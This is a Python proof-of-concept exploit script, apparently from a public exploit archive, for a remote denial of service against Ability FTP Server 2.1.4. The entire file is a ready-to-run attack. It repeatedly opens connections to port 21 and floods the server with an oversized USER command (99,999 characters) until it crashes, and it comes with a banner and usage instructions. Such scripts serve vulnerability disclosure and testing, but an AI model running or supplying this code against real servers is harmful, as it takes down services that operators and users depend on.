#!/usr/bin/env python # # Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos # Date: 2015-08-15 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.codecrafters.com # Software Link: http://www.codecrafters.com/AbilityFTPServer # Version: 2.1.4 # Tested on: Windows 7 # import socket import sys import os def clear(): os.system("cls") def banner(): print "############################################".center(80) print "# Ability FTP Server DoS PoC #".center(80) print "# Author: St0rn #".center(80) print "# <fabien[at]anbu-pentest[dot]com> #".center(80) print "############################################".center(80) def createconn(ip): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((ip,21)) except: print "\n" print "[+] Server Down!".center(80) sys.exit(0) return s def crash(sock): try: while 1: sock.send('USER '+'a'*99999) sys.stdout.write('.') except: sock.close() ############### Main ############### clear() banner() if len(sys.argv)==2: print "\n" print "Waiting 2 or 3 minutes before crash".center(80) print "(The server can be run without afsloader.exe)".center(80) while 1: s=createconn(sys.argv[1]) crash(s) else: print "\n" print "Usage: AftpDos.py [Server IP]".center(80) sys.exit(0)